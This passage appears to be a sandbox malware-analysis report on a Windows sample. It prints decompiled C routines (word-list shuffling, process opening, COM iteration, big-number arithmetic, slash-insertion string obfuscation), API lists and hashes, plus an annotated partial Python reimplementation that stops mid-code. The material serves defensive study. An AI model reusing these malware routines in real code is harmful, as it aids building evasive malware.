                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 22%
                                                        			E01202D0E(signed int __eax, signed int _a4, signed int _a8) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				intOrPtr _v16;
                                                        				signed int _v20;
                                                        				intOrPtr _t81;
                                                        				char _t83;
                                                        				signed int _t90;
                                                        				signed int _t97;
                                                        				signed int _t99;
                                                        				char _t101;
                                                        				unsigned int _t102;
                                                        				intOrPtr _t103;
                                                        				char* _t107;
                                                        				signed int _t110;
                                                        				signed int _t113;
                                                        				signed int _t118;
                                                        				signed int _t122;
                                                        				intOrPtr _t124;
                                                        
                                                        				_t102 = _a8;
                                                        				_t118 = 0;
                                                        				_v20 = __eax;
                                                        				_t122 = (_t102 >> 2) + 1;
                                                        				_v8 = 0;
                                                        				_a8 = 0;
                                                        				_t81 = E01205FBC(_t122 << 2);
                                                        				_v16 = _t81;
                                                        				if(_t81 == 0) {
                                                        					_push(8);
                                                        					_pop(0);
                                                        					L37:
                                                        					return 0;
                                                        				}
                                                        				_t107 = _a4;
                                                        				_a4 = _t102;
                                                        				_t113 = 0;
                                                        				while(1) {
                                                        					_t83 =  *_t107;
                                                        					if(_t83 == 0) {
                                                        						break;
                                                        					}
                                                        					if(_t83 == 0xd || _t83 == 0xa) {
                                                        						if(_t118 != 0) {
                                                        							if(_t118 > _v8) {
                                                        								_v8 = _t118;
                                                        							}
                                                        							_a8 = _a8 + 1;
                                                        							_t118 = 0;
                                                        						}
                                                        						 *_t107 = 0;
                                                        						goto L16;
                                                        					} else {
                                                        						if(_t118 != 0) {
                                                        							L10:
                                                        							_t118 = _t118 + 1;
                                                        							L16:
                                                        							_t107 = _t107 + 1;
                                                        							_t15 =  &_a4;
                                                        							 *_t15 = _a4 - 1;
                                                        							if( *_t15 != 0) {
                                                        								continue;
                                                        							}
                                                        							break;
                                                        						}
                                                        						if(_t113 == _t122) {
                                                        							L21:
                                                        							if(_a8 <= 0x20) {
                                                        								_push(0xb);
                                                        								L34:
                                                        								_pop(0);
                                                        								L35:
                                                        								E012013CC(_v16);
                                                        								goto L37;
                                                        							}
                                                        							_t103 = E01205FBC((_v8 + _v8 + 5) * _a8 + 4);
                                                        							if(_t103 == 0) {
                                                        								_push(8);
                                                        								goto L34;
                                                        							}
                                                        							_t90 = _a8;
                                                        							_a4 = _a4 & 0x00000000;
                                                        							_v8 = _v8 & 0x00000000;
                                                        							_t124 = _t103 + _t90 * 4;
                                                        							if(_t90 <= 0) {
                                                        								L31:
                                                        								 *0x120a2cc = _t103;
                                                        								goto L35;
                                                        							}
                                                        							do {
                                                        								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                                                        								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                                                        								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                                                        								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                                                        								_v12 = _v12 & 0x00000000;
                                                        								if(_a4 <= 0) {
                                                        									goto L30;
                                                        								} else {
                                                        									goto L26;
                                                        								}
                                                        								while(1) {
                                                        									L26:
                                                        									_t99 = _v12;
                                                        									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124);
                                                        									if(_t99 == 0) {
                                                        										break;
                                                        									}
                                                        									_v12 = _v12 + 1;
                                                        									if(_v12 < _a4) {
                                                        										continue;
                                                        									}
                                                        									goto L30;
                                                        								}
                                                        								_v8 = _v8 - 1;
                                                        								L30:
                                                        								_t97 = _a4;
                                                        								_a4 = _a4 + 1;
                                                        								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                                                        								__imp__(_t124);
                                                        								_v8 = _v8 + 1;
                                                        								_t124 = _t124 + _t97 + 1;
                                                        							} while (_v8 < _a8);
                                                        							goto L31;
                                                        						}
                                                        						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                                                        						_t101 = _t83;
                                                        						if(_t83 - 0x61 <= 0x19) {
                                                        							_t101 = _t101 - 0x20;
                                                        						}
                                                        						 *_t107 = _t101;
                                                        						_t113 = _t113 + 1;
                                                        						goto L10;
                                                        					}
                                                        				}
                                                        				if(_t118 != 0) {
                                                        					if(_t118 > _v8) {
                                                        						_v8 = _t118;
                                                        					}
                                                        					_a8 = _a8 + 1;
                                                        				}
                                                        				goto L21;
                                                        			}

                                                        APIs
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • lstrcpy.KERNEL32(69B25F45,00000020), ref: 01202E0B
                                                        • lstrcat.KERNEL32(69B25F45,00000020), ref: 01202E20
                                                        • lstrcmp.KERNEL32(00000000,69B25F45), ref: 01202E37
                                                        • lstrlen.KERNEL32(69B25F45), ref: 01202E5B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                                        • String ID:
                                                        • API String ID: 3214092121-3916222277
                                                        • Opcode ID: 33497d8ac73aab4cd9fca001623a0d148e4d46ab938ec42c0a64d59c618a481e
                                                        • Instruction ID: 88adbf33c181679c3a6eac200e2a458174714fc4b6f7cff3325811f1ef8ffdd2
                                                        • Opcode Fuzzy Hash: 33497d8ac73aab4cd9fca001623a0d148e4d46ab938ec42c0a64d59c618a481e
                                                        • Instruction Fuzzy Hash: 5451A53191011AEFDF26CF59C4886ADBBB5FF55314F148257EA199B287C770AE41CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E01201DFA(intOrPtr _a4) {
                                                        				void* _t2;
                                                        				long _t4;
                                                        				void* _t5;
                                                        				long _t6;
                                                        				void* _t7;
                                                        
                                                        				_t2 = CreateEventA(0, 1, 0, 0);
                                                        				 *0x120a2c4 = _t2;
                                                        				if(_t2 == 0) {
                                                        					return GetLastError();
                                                        				}
                                                        				_t4 = GetVersion();
                                                        				if(_t4 <= 5) {
                                                        					_t5 = 0x32;
                                                        					return _t5;
                                                        				}
                                                        				 *0x120a2b4 = _t4;
                                                        				_t6 = GetCurrentProcessId();
                                                        				 *0x120a2b0 = _t6;
                                                        				 *0x120a2bc = _a4;
                                                        				_t7 = OpenProcess(0x10047a, 0, _t6);
                                                        				 *0x120a2ac = _t7;
                                                        				if(_t7 == 0) {
                                                        					 *0x120a2ac =  *0x120a2ac | 0xffffffff;
                                                        				}
                                                        				return 0;
                                                        			}

                                                        APIs
                                                        • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,0120686A,?,?,00000001), ref: 01201E02
                                                        • GetVersion.KERNEL32(?,00000001), ref: 01201E11
                                                        • GetCurrentProcessId.KERNEL32(?,00000001), ref: 01201E20
                                                        • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001), ref: 01201E3D
                                                        • GetLastError.KERNEL32(?,00000001), ref: 01201E5C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                        • String ID:
                                                        • API String ID: 2270775618-0
                                                        • Opcode ID: fe99a22a8f167f975678be1792c5f8164beb1b3b951b12ed48ad8affb3991c07
                                                        • Instruction ID: b9d93ffb06d381d461eaa9abc0d6b9ec89a09b7ac17964dda7a5f7054fec59d0
                                                        • Opcode Fuzzy Hash: fe99a22a8f167f975678be1792c5f8164beb1b3b951b12ed48ad8affb3991c07
                                                        • Instruction Fuzzy Hash: 3FF049706653129FEB338F24B80DB193AB9A704B40F808329E20BC61CBD3B18450CB15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 46%
                                                        			E01204598(intOrPtr* __eax) {
                                                        				void* _v8;
                                                        				WCHAR* _v12;
                                                        				void* _v16;
                                                        				char _v20;
                                                        				void* _v24;
                                                        				intOrPtr _v28;
                                                        				void* _v32;
                                                        				intOrPtr _v40;
                                                        				short _v48;
                                                        				intOrPtr _v56;
                                                        				short _v64;
                                                        				intOrPtr* _t54;
                                                        				intOrPtr* _t56;
                                                        				intOrPtr _t57;
                                                        				intOrPtr* _t58;
                                                        				intOrPtr* _t60;
                                                        				void* _t61;
                                                        				intOrPtr* _t63;
                                                        				intOrPtr* _t65;
                                                        				intOrPtr* _t67;
                                                        				intOrPtr* _t69;
                                                        				intOrPtr* _t71;
                                                        				intOrPtr* _t74;
                                                        				intOrPtr* _t76;
                                                        				intOrPtr _t78;
                                                        				intOrPtr* _t82;
                                                        				intOrPtr* _t86;
                                                        				intOrPtr _t102;
                                                        				intOrPtr _t108;
                                                        				void* _t117;
                                                        				void* _t121;
                                                        				void* _t122;
                                                        				intOrPtr _t129;
                                                        
                                                        				_t122 = _t121 - 0x3c;
                                                        				_push( &_v8);
                                                        				_push(__eax);
                                                        				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
                                                        				if(_t117 >= 0) {
                                                        					_t54 = _v8;
                                                        					_t102 =  *0x120a2d4; // 0x455d5a8
                                                        					_t5 = _t102 + 0x120b038; // 0x3050f485
                                                        					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
                                                        					_t56 = _v8;
                                                        					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
                                                        					if(_t117 >= 0) {
                                                        						__imp__#2(0x12092b0);
                                                        						_v28 = _t57;
                                                        						if(_t57 == 0) {
                                                        							_t117 = 0x8007000e;
                                                        						} else {
                                                        							_t60 = _v32;
                                                        							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
                                                        							_t86 = __imp__#6;
                                                        							_t117 = _t61;
                                                        							if(_t117 >= 0) {
                                                        								_t63 = _v24;
                                                        								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
                                                        								if(_t117 >= 0) {
                                                        									_t129 = _v20;
                                                        									if(_t129 != 0) {
                                                        										_v64 = 3;
                                                        										_v48 = 3;
                                                        										_v56 = 0;
                                                        										_v40 = 0;
                                                        										if(_t129 > 0) {
                                                        											while(1) {
                                                        												_t67 = _v24;
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												_t122 = _t122;
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												asm("movsd");
                                                        												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
                                                        												if(_t117 < 0) {
                                                        													goto L16;
                                                        												}
                                                        												_t69 = _v8;
                                                        												_t108 =  *0x120a2d4; // 0x455d5a8
                                                        												_t28 = _t108 + 0x120b0bc; // 0x3050f1ff
                                                        												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
                                                        												if(_t117 >= 0) {
                                                        													_t74 = _v16;
                                                        													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
                                                        													if(_t117 >= 0 && _v12 != 0) {
                                                        														_t78 =  *0x120a2d4; // 0x455d5a8
                                                        														_t33 = _t78 + 0x120b078; // 0x76006f
                                                        														if(lstrcmpW(_v12, _t33) == 0) {
                                                        															_t82 = _v16;
                                                        															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
                                                        														}
                                                        														 *_t86(_v12);
                                                        													}
                                                        													_t76 = _v16;
                                                        													 *((intOrPtr*)( *_t76 + 8))(_t76);
                                                        												}
                                                        												_t71 = _v8;
                                                        												 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                        												_v40 = _v40 + 1;
                                                        												if(_v40 < _v20) {
                                                        													continue;
                                                        												}
                                                        												goto L16;
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        								L16:
                                                        								_t65 = _v24;
                                                        								 *((intOrPtr*)( *_t65 + 8))(_t65);
                                                        							}
                                                        							 *_t86(_v28);
                                                        						}
                                                        						_t58 = _v32;
                                                        						 *((intOrPtr*)( *_t58 + 8))(_t58);
                                                        					}
                                                        				}
                                                        				return _t117;
                                                        			}

                                                        APIs
                                                        • SysAllocString.OLEAUT32(012092B0), ref: 012045E8
                                                        • lstrcmpW.KERNEL32(00000000,0076006F), ref: 012046CA
                                                        • SysFreeString.OLEAUT32(00000000), ref: 012046E3
                                                        • SysFreeString.OLEAUT32(?), ref: 01204712
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$Free$Alloclstrcmp
                                                        • String ID:
                                                        • API String ID: 1885612795-0
                                                        • Opcode ID: 8f3ab0d2573690c32b89e67aa2603a3bc4f57adc173381e8d4b773ff274b52b7
                                                        • Instruction ID: ce142c2f2ccc55348d55773de4c81aa717c3f34e81d33d6f72d7411f1b515c6d
                                                        • Opcode Fuzzy Hash: 8f3ab0d2573690c32b89e67aa2603a3bc4f57adc173381e8d4b773ff274b52b7
                                                        • Instruction Fuzzy Hash: 24517475D0051ADFCF11EFA8C4888AEF7B5FF89704B108694EA15EB256D731AD41CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SysAllocString.OLEAUT32(00000000), ref: 012062BF
                                                        • SysFreeString.OLEAUT32(00000000), ref: 012063A2
                                                          • Part of subcall function 01204598: SysAllocString.OLEAUT32(012092B0), ref: 012045E8
                                                        • SafeArrayDestroy.OLEAUT32(?), ref: 012063F6
                                                        • SysFreeString.OLEAUT32(?), ref: 01206404
                                                          • Part of subcall function 0120708C: Sleep.KERNEL32(000001F4), ref: 012070D4
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: String$AllocFree$ArrayDestroySafeSleep
                                                        • String ID:
                                                        • API String ID: 3193056040-0
                                                        • Opcode ID: 4427e066a178f8a8ae09607ce960f15da391398878b66f767fa44bf654a4bcdc
                                                        • Instruction ID: b6bb7329eaf0d8d4c76d5f69b691ab9ee6eea6ce3115b1c14bf9ef4dc3c02e20
                                                        • Opcode Fuzzy Hash: 4427e066a178f8a8ae09607ce960f15da391398878b66f767fa44bf654a4bcdc
                                                        • Instruction Fuzzy Hash: 2551653591020AEFDB12DFE8C8848AEB7B6FF88700B148929E646DB251D731AD55CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 85%
                                                        			E0120472B(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				signed int _v16;
                                                        				void _v156;
                                                        				void _v428;
                                                        				void* _t55;
                                                        				unsigned int _t56;
                                                        				signed int _t66;
                                                        				signed int _t74;
                                                        				void* _t76;
                                                        				signed int _t79;
                                                        				void* _t81;
                                                        				void* _t92;
                                                        				void* _t96;
                                                        				signed int* _t99;
                                                        				signed int _t101;
                                                        				signed int _t103;
                                                        				void* _t107;
                                                        
                                                        				_t92 = _a12;
                                                        				_t101 = __eax;
                                                        				_t55 = E012070EC(_a16, _t92);
                                                        				_t79 = _t55;
                                                        				if(_t79 == 0) {
                                                        					L18:
                                                        					return _t55;
                                                        				}
                                                        				_t56 =  *(_t92 + _t79 * 4 - 4);
                                                        				_t81 = 0;
                                                        				_t96 = 0x20;
                                                        				if(_t56 == 0) {
                                                        					L4:
                                                        					_t97 = _t96 - _t81;
                                                        					_v12 = _t96 - _t81;
                                                        					E01203954(_t79,  &_v428);
                                                        					 *((intOrPtr*)(_t107 + _t101 * 4 - 0x1a8)) = E01206136(_t101,  &_v428, _a8, _t96 - _t81);
                                                        					E01206136(_t79,  &_v156, _a12, _t97);
                                                        					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x9c));
                                                        					_t66 = E01203954(_t101,  &E0120A188);
                                                        					_t103 = _t101 - _t79;
                                                        					_a8 = _t103;
                                                        					if(_t103 < 0) {
                                                        						L17:
                                                        						E01203954(_a16, _a4);
                                                        						E01202E9B(_t79,  &_v428, _a4, _t97);
                                                        						memset( &_v428, 0, 0x10c);
                                                        						_t55 = memset( &_v156, 0, 0x84);
                                                        						goto L18;
                                                        					}
                                                        					_t99 = _t107 + (_t103 + _t79) * 4 - 0x1a8;
                                                        					do {
                                                        						if(_v8 != 0xffffffff) {
                                                        							_push(1);
                                                        							_push(0);
                                                        							_push(0);
                                                        							_push( *_t99);
                                                        							L01207DDC();
                                                        							_t74 = _t66 +  *(_t99 - 4);
                                                        							asm("adc edx, esi");
                                                        							_push(0);
                                                        							_push(_v8 + 1);
                                                        							_push(_t92);
                                                        							_push(_t74);
                                                        							L01207DD6();
                                                        							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                        								_t74 = _t74 | 0xffffffff;
                                                        								_v16 = _v16 & 0x00000000;
                                                        							}
                                                        						} else {
                                                        							_t74 =  *_t99;
                                                        						}
                                                        						_t106 = _t107 + _a8 * 4 - 0x1a8;
                                                        						_a12 = _t74;
                                                        						_t76 = E012021FA(_t79,  &_v156, _t92, _t107 + _a8 * 4 - 0x1a8, _t107 + _a8 * 4 - 0x1a8, _t74);
                                                        						while(1) {
                                                        							 *_t99 =  *_t99 - _t76;
                                                        							if( *_t99 != 0) {
                                                        								goto L14;
                                                        							}
                                                        							L13:
                                                        							_t92 =  &_v156;
                                                        							if(E01205C5B(_t79, _t92, _t106) < 0) {
                                                        								break;
                                                        							}
                                                        							L14:
                                                        							_a12 = _a12 + 1;
                                                        							_t76 = E0120584E(_t79,  &_v156, _t106, _t106);
                                                        							 *_t99 =  *_t99 - _t76;
                                                        							if( *_t99 != 0) {
                                                        								goto L14;
                                                        							}
                                                        							goto L13;
                                                        						}
                                                        						_a8 = _a8 - 1;
                                                        						_t66 = _a12;
                                                        						_t99 = _t99 - 4;
                                                        						 *(_a8 * 4 +  &E0120A188) = _t66;
                                                        					} while (_a8 >= 0);
                                                        					_t97 = _v12;
                                                        					goto L17;
                                                        				}
                                                        				while(_t81 < _t96) {
                                                        					_t81 = _t81 + 1;
                                                        					_t56 = _t56 >> 1;
                                                        					if(_t56 != 0) {
                                                        						continue;
                                                        					}
                                                        					goto L4;
                                                        				}
                                                        				goto L4;
                                                        			}

                                                        APIs
                                                        • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 012047DE
                                                        • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 012047F4
                                                        • memset.NTDLL ref: 0120489D
                                                        • memset.NTDLL ref: 012048B3
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memset$_allmul_aulldiv
                                                        • String ID:
                                                        • API String ID: 3041852380-0
                                                        • Opcode ID: 98ec9731b1b0b457e9ccae59da695bcacd58af223ed33629111065f0fef50b9b
                                                        • Instruction ID: 1babf6441079bfcfc0e9088a6c924ebeb13c4e8d7a1d90b62a34ef9a92ec8755
                                                        • Opcode Fuzzy Hash: 98ec9731b1b0b457e9ccae59da695bcacd58af223ed33629111065f0fef50b9b
                                                        • Instruction Fuzzy Hash: E541B831A1025AAFDB12EF68DC40BEE7775EF55310F008669FA19972C2DB70AE44CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 78%
                                                        			E01203AD2(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                        				intOrPtr _v8;
                                                        				void* _v12;
                                                        				void* _v16;
                                                        				intOrPtr _t26;
                                                        				intOrPtr* _t28;
                                                        				intOrPtr _t31;
                                                        				intOrPtr* _t32;
                                                        				void* _t39;
                                                        				int _t46;
                                                        				intOrPtr* _t47;
                                                        				int _t48;
                                                        
                                                        				_t47 = __eax;
                                                        				_push( &_v12);
                                                        				_push(__eax);
                                                        				_t39 = 0;
                                                        				_t46 = 0;
                                                        				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                        				_v8 = _t26;
                                                        				if(_t26 < 0) {
                                                        					L13:
                                                        					return _v8;
                                                        				}
                                                        				if(_v12 == 0) {
                                                        					Sleep(0xc8);
                                                        					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                        				}
                                                        				if(_v8 >= _t39) {
                                                        					_t28 = _v12;
                                                        					if(_t28 != 0) {
                                                        						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                        						_v8 = _t31;
                                                        						if(_t31 >= 0) {
                                                        							_t46 = lstrlenW(_v16);
                                                        							if(_t46 != 0) {
                                                        								_t46 = _t46 + 1;
                                                        								_t48 = _t46 + _t46;
                                                        								_t39 = E01205FBC(_t48);
                                                        								if(_t39 == 0) {
                                                        									_v8 = 0x8007000e;
                                                        								} else {
                                                        									memcpy(_t39, _v16, _t48);
                                                        								}
                                                        								__imp__#6(_v16);
                                                        							}
                                                        						}
                                                        						_t32 = _v12;
                                                        						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                        					}
                                                        					 *_a4 = _t39;
                                                        					 *_a8 = _t46 + _t46;
                                                        				}
                                                        				goto L13;
                                                        			}

                                                        APIs
                                                        • Sleep.KERNEL32(000000C8), ref: 01203B00
                                                        • lstrlenW.KERNEL32(?), ref: 01203B36
                                                        • memcpy.NTDLL(00000000,?,00000000,00000000), ref: 01203B57
                                                        • SysFreeString.OLEAUT32(?), ref: 01203B6B
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: FreeSleepStringlstrlenmemcpy
                                                        • String ID:
                                                        • API String ID: 1198164300-0
                                                        • Opcode ID: be32d24248e5d0e6dfc4df92b33e61e074f216e78b0f9badef0702b2e1ad08cd
                                                        • Instruction ID: 3441cb58bf9723530b4e703cf0397276afdf2259ba9315112e96cf49ffb52ce7
                                                        • Opcode Fuzzy Hash: be32d24248e5d0e6dfc4df92b33e61e074f216e78b0f9badef0702b2e1ad08cd
                                                        • Instruction Fuzzy Hash: C121867590060AFFDB12DFA8D888D9EBBB8FF49314B104269EA45D7252E730DA40CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
			E01204FE5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax; // input: NUL-terminated ANSI string
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx); // lstrlen(input) (see APIs below)
				_t38 = __eax; // characters still to process
				_t30 = RtlAllocateHeap( *0x120a290, 0, (__eax >> 3) + __eax + 1); // len + len/8 + 1: at most one '/' per 8 input chars, plus the terminator
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42; // read cursor into the input
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38; // chunk ceiling = min(remaining, 24)
						}
						_t21 =  *0x120a2a8; // 0x5e4f4d72 -- global PRNG state
						_t23 = 0x3c6ef35f + _t21 * 0x19660d; // LCG step: x = 0x19660D * x + 0x3C6EF35F (mod 2^32)
						 *0x120a2a8 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8; // chunk = 8 + (low 16 bits % (ceiling - 8)); no guard for ceiling <= 8
						memcpy(_t30, _v8, _t45); // copy the chunk
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc; // cdecl stack cleanup after memcpy
						 *_t27 = 0x2f; // append '/' after the chunk
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8); // keep splitting while more than 8 characters remain
					memcpy(_t30, _v8, _t38 + 1); // copy the tail (1..8 characters) including the NUL
				}
				return _v12; // new heap string: the input with '/' inserted every 8..23 characters
			}

Instruction addresses (report address column, in listing order): 0x01204fed 0x01204ff0 0x01204ff6 0x0120500e 0x01205012 0x01205015 0x01205017 0x0120501a 0x0120501c 0x0120501f 0x01205021 0x01205021 0x01205023 0x0120502e 0x01205033 0x01205044 0x0120504c 0x01205051 0x01205054 0x01205057 0x01205059 0x0120505f 0x01205062 0x01205062 0x01205062 0x0120506d 0x01205072 0x0120507c

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,012071E9,00000000,?,00000000,01204A9F,00000000,05769630), ref: 01204FF0
                                                        • RtlAllocateHeap.NTDLL(00000000,?), ref: 01205008
                                                        • memcpy.NTDLL(00000000,05769630,-00000008,?,?,?,012071E9,00000000,?,00000000,01204A9F,00000000,05769630), ref: 0120504C
                                                        • memcpy.NTDLL(00000001,05769630,00000001,01204A9F,00000000,05769630), ref: 0120506D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
• Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp
• Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp
• Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: memcpy$AllocateHeaplstrlen
                                                        • String ID:
                                                        • API String ID: 1819133394-0
                                                        • Opcode ID: 3bfa2b3320927a19db1c97685f68ec41c5b6c83cf9a3cb8b3ada994ad95c5cce
                                                        • Instruction ID: d5d59cd5df5af492465442c85ef71c234da61e942c98b2d6362e6de4976291ff
                                                        • Opcode Fuzzy Hash: 3bfa2b3320927a19db1c97685f68ec41c5b6c83cf9a3cb8b3ada994ad95c5cce
                                                        • Instruction Fuzzy Hash: 17110A72A10215BFD722CB69EC88E9EBBBEEB94250B040376E60597192E6719D009790
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
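The routine E01204FE5 above is small enough to reimplement, which is useful when matching the '/'-separated strings it produces against what the sample emits. The following Python is an added example written for this page, not code from the sample or from the report; it mirrors the arithmetic in the listing (LCG constants 0x19660D and 0x3C6EF35F, 16-bit slice of the state, chunk ceiling 24, minimum chunk 8, loop exit when 8 or fewer characters remain). Assumptions: the PRNG state at 0x120a2a8 is a 32-bit value (the decompiler's `signed short` typing of `_t23` is ignored), the seed is whatever the caller supplies (the dump shows 0x5e4f4d72), and inputs of 8 or fewer characters, which the listing does not guard against, are returned unchanged.

```python
"""Reimplementation of E01204FE5: insert '/' into a string at PRNG-chosen
intervals of 8..23 characters. Added example; not code from the sample."""

LCG_MUL = 0x19660D      # multiplier read from the listing
LCG_ADD = 0x3C6EF35F    # increment read from the listing
MASK32 = 0xFFFFFFFF
MAX_CHUNK = 0x18        # chunk ceiling (24) from the listing
MIN_CHUNK = 8           # minimum chunk size and loop-exit threshold


def lcg_step(state: int) -> int:
    """One generator step: x = 0x19660D * x + 0x3C6EF35F mod 2^32 (32-bit state assumed)."""
    return (state * LCG_MUL + LCG_ADD) & MASK32


def slash_split(s: str, seed: int) -> tuple[str, int]:
    """Return (obfuscated string, updated PRNG state), following the decompiled loop."""
    remaining = len(s)
    # The native routine has no check here: with remaining <= 8 the modulus
    # (ceiling - 8) is zero or wraps negative. This reimplementation returns
    # the input unchanged instead (an assumption, not observed behaviour).
    if remaining <= MIN_CHUNK:
        return s, seed
    state = seed
    out = []
    pos = 0
    while True:
        ceiling = min(remaining, MAX_CHUNK)          # min(remaining, 24)
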